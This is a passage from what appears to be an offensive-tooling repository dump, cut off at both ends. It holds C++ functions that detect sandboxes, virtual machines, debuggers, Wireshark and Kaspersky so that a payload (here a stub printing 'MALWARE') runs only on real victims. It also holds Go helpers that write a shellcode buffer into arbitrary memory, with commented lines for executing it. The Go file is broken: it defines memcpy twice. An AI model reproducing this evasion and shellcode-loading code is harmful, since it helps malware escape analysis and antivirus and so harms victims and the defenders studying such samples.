0; 75 | 76 | } 77 | 78 | BOOL IsFolderExist(const string comp) 79 | { 80 | 81 | if(chdir(comp.c_str()) == 0) 82 | { 83 | return 1; 84 | } 85 | 86 | return 0; 87 | } 88 | 89 | BOOL IsFileNameEqualThis(const string comp) 90 | { 91 | char buff[255]; 92 | 93 | GetModuleFileName(0,buff,255); 94 | 95 | if(strcmp(buff,comp.c_str()) == 0) 96 | { 97 | detected++; 98 | return 1; 99 | } 100 | return 0; 101 | } 102 | 103 | BOOL IsFileExist(const string comp) 104 | { 105 | FILE *fp = NULL,*fp2 = NULL; 106 | fp = fopen(comp.c_str(),"r"); 107 | 108 | if(fp != NULL) 109 | { 110 | return 1; 111 | } 112 | 113 | return 0; 114 | } 115 | 116 | BOOL IsAnubis() 117 | { 118 | 119 | if (IsFileInFolder("C:\\InsideTm\\") == 1) 120 | { 121 | detected = 1; 122 | return 1; 123 | } 124 | 125 | else if(IsFileNameEqualThis("C:\\sample.exe")) 126 | { 127 | detected = 1; 128 | return 1; 129 | } 130 | 131 | else if(IsUsername("user") == 1) 132 | { 133 | detected = 1; 134 | return 1; 135 | } 136 | 137 | return 0; 138 | } 139 | 140 | BOOL IsTE() 141 | { 142 | 143 | if(IsUsername("UserName") == 1) 144 | { 145 | detected = 1; 146 | return 1; 147 | } 148 | 149 | return 0; 150 | } 151 | 152 | BOOL IsSandbox() 153 | { 154 | 155 | if(IsUsername("USER") == 1) 156 | { 157 | detected = 1; 158 | return 1; 159 | } 160 | 161 | return 0; 162 | } 163 | 164 | BOOL IsJB() 165 | { 166 | 167 | if(IsProcessRunning("joeboxserver.exe") == 1 || IsProcessRunning("joeboxcontrol.exe") == 1) 168 | { 169 | detected = 1; 170 | return 1; 171 | } 172 | 173 | return 0; 174 | } 175 | 176 | BOOL IsNorman() 177 | { 178 | 179 | if(IsUsername("currentuser") == 1 || IsUsername("CurrentUser") == 1) 180 | { 181 | detected = 1; 182 | return 1; 183 | } 184 | 185 | return 0; 186 | } 187 | 188 | BOOL IsWireShark() 189 | { 190 | 191 | if(IsProcessRunning("wireshark.exe") == 1) 192 | { 193 | detected = 1; 194 | return 1; 195 | } 196 | 197 | return 0; 198 | } 199 | 200 | BOOL IsKaspersky() 201 | { 202 | 203 | if(IsProcessRunning("avp.exe") == 1) 204 | { 205 | detected = 1; 206 | return 1; 207 | } 208 | 209 | return 0; 210 | } 211 | 212 | 213 | BOOL IsID() 214 | { 215 | 216 | if(GetModuleHandle("api_log.dll") || GetModuleHandle("dir_watch.dll")) 217 | { 218 | detected = 1; 219 | return 1; 220 | } 221 | 222 | else if(IsProcessRunning("sniff_hit.exe") == 1 || IsProcessRunning("sysAnalyzer.exe") == 1) 223 | { 224 | detected = 1; 225 | return 1; 226 | } 227 | 228 | return 0; 229 | } 230 | 231 | BOOL IsSunbelt() 232 | { 233 | 234 | if(GetModuleHandle("pstorec.dll")) 235 | { 236 | detected = 1; 237 | return 1; 238 | } 239 | 240 | else if(IsFolderExist("C:\\analysis") == 1) 241 | { 242 | detected = 1; 243 | return 1; 244 | } 245 | 246 | else if(IsFileExist("C:\\analysis\\SandboxStarter.exe") == 1) //sometimes the IsFolderExist fail 247 | { 248 | detected = 1; 249 | return 1; 250 | } 251 | 252 | return 0; 253 | } 254 | 255 | BOOL IsSandboxie() 256 | { 257 | 258 | if(GetModuleHandle("SbieDll.dll")) 259 | { 260 | detected = 1; 261 | return 1; 262 | } 263 | 264 | return 0; 265 | } 266 | 267 | BOOL IsVPC() //steve10120 268 | { 269 | HMODULE dll = LoadLibrary("C:\\vmcheck.dll"); 270 | 271 | if(dll == NULL) 272 | { 273 | return 0; 274 | } 275 | 276 | BOOL (WINAPI *fnIsRunningInsideVirtualMachine)() = (BOOL (WINAPI *)()) GetProcAddress(dll, "IsRunningInsideVirtualMachine"); 277 | 278 | BOOL retValue = FALSE; 279 | 280 | if(fnIsRunningInsideVirtualMachine != NULL) 281 | { 282 | retValue = fnIsRunningInsideVirtualMachine(); 283 | FreeLibrary(dll); 284 | detected = 1; 285 | return 1; 286 | } 287 | 288 | FreeLibrary(dll); 289 | 290 | return 0; 291 | } 292 | 293 | BOOL IsOther() //carb0n 294 | { 295 | unsigned char bBuffer; 296 | unsigned long aCreateProcess = (unsigned long)GetProcAddress( GetModuleHandle( "KERNEL32.dll" ), "CreateProcessA" ); 297 | 298 | ReadProcessMemory( GetCurrentProcess( ), (void *) aCreateProcess, &bBuffer, 1, 0 ); 299 | 300 | if( bBuffer == 0xE9 ) 301 | { 302 | detected = 1; 303 | return 1; 304 | } 305 | 306 | return 0; 307 | } 308 | 309 | BOOL IsEmu() //Noble & ChainCoder 310 | { 311 | DWORD countit, countit2; 312 | 313 | countit = GetTickCount(); 314 | Sleep(500); 315 | countit2 = GetTickCount(); 316 | 317 | if ((countit2 - countit) < 500) 318 | { 319 | detected = 1; 320 | return 1; 321 | } 322 | 323 | return 0; 324 | } 325 | 326 | BOOL IsVB() 327 | { 328 | 329 | if(IsProcessRunning("VBoxService.exe") == 1) 330 | { 331 | detected = 1; 332 | return 1; 333 | } 334 | 335 | return 0; 336 | } 337 | 338 | BOOL IsWPE() 339 | { 340 | 341 | if(GetModuleHandle("WpeSpy.dll")) 342 | { 343 | detected = 1; 344 | return 1; 345 | } 346 | 347 | else if(IsProcessRunning("WPE PRO.exe") == 1) 348 | { 349 | detected = 1; 350 | return 1; 351 | } 352 | 353 | return 0; 354 | } 355 | 356 | 357 | BOOL malware() 358 | { 359 | //some malware code 360 | cout << "MALWARE" << endl; 361 | 362 | return 0; 363 | } 364 | 365 | 366 | BOOL IsAll() 367 | { 368 | if(IsAnubis() == 1) 369 | { 370 | } 371 | else if(IsTE() == 1) 372 | { 373 | } 374 | else if(IsSandbox() == 1) 375 | { 376 | } 377 | else if(IsJB() == 1) 378 | { 379 | } 380 | else if(IsNorman() == 1) 381 | { 382 | } 383 | else if(IsWireShark() == 1) 384 | { 385 | } 386 | else if(IsKaspersky() == 1) 387 | { 388 | } 389 | else if(IsID() == 1) 390 | { 391 | } 392 | else if(IsSunbelt() == 1) 393 | { 394 | } 395 | else if(IsSandboxie() == 1) 396 | { 397 | } 398 | else if(IsVPC() == 1) 399 | { 400 | } 401 | else if(IsVB() == 1) 402 | { 403 | } 404 | else if(IsWPE() == 1) 405 | { 406 | } 407 | else if(IsOther() == 1 || IsEmu() == 1) 408 | { 409 | } 410 | if(detected != 0) 411 | { 412 | return 1; 413 | } 414 | return 0; 415 | } 416 | -------------------------------------------------------------------------------- /writeMem.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "unsafe" 4 | 5 | func main(){ 6 | var shellcode = []byte{0x00} 7 | var baseA uintptr 8 | 9 | 10 | //write memory 11 | WriteMemory(shellcode, baseA) 12 | memcpy(baseA, shellcode) 13 | // *(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&rawShellcode)) 14 | //syscall.Syscall(uintptr(unsafe.Pointer(&rawShellcode[0])),0, 0, 0, 0) 15 | //targetPtr() 16 | } 17 | 18 | 19 | //WriteMemory writes the provided memory to the specified memory address. Does **not** check permissions, may cause panic if memory is not writable etc. 20 | func WriteMemory(inbuf []byte, destination uintptr) { 21 | for index := uint32(0); index < uint32(len(inbuf)); index++ { 22 | writePtr := unsafe.Pointer(destination + uintptr(index)) 23 | v := (*byte)(writePtr) 24 | *v = inbuf[index] 25 | } 26 | } 27 | 28 | func memcpy(base uintptr, buf []byte) { 29 | for i := 0; i < len(buf); i++ { 30 | *(*byte)(unsafe.Pointer(base + uintptr(i))) = buf[i] 31 | } 32 | } 33 | 34 | func memcpy(src, dst, size uintptr) { 35 | for i := uintptr(0); i < size; i++ { 36 | *(*uint8)(unsafe.Pointer(dst + i)) = *(*uint8)(unsafe.Pointer(src + i)) 37 | } 38 | } 39 | 40 | func Memset(ptr uintptr, c byte, n uintptr){ 41 | var i uintptr 42 | for i = 0;i